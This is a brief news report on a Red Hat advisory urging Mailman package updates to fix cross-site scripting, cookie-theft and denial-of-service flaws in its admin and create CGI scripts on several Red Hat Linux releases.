Red Hat recommends updating the Mailman package included in several versions of its Linux operating system to correct vulnerabilities that could allow remote cross-site scripting and denial of service attacks.
Mailman is a program for managing mailing lists and is shipped with Red Hat's Linux operating system under a GNU General Public License. Mailman has several vulnerabilities.
One flaw in the admin CGI script of Mailman versions that predate 2.1.4 can allow a remote attacker to steal session cookies and to conduct unauthorized activities, including cross-site scripting . This could lead to a denial of service.
Another flaw in the create CGI script of Mailman 2.1.x versions before 2.1.3 also permits a remote attacker to steal cookies.
Mailman has suffered from other cross-scripting problems in the past. The current vulnerability affects Linux Advanced Server 2.1 for Itanium, Enterprise Linux ES 2.1 and Enterprise Linux AS 2.1. Updates are available from Red Hat.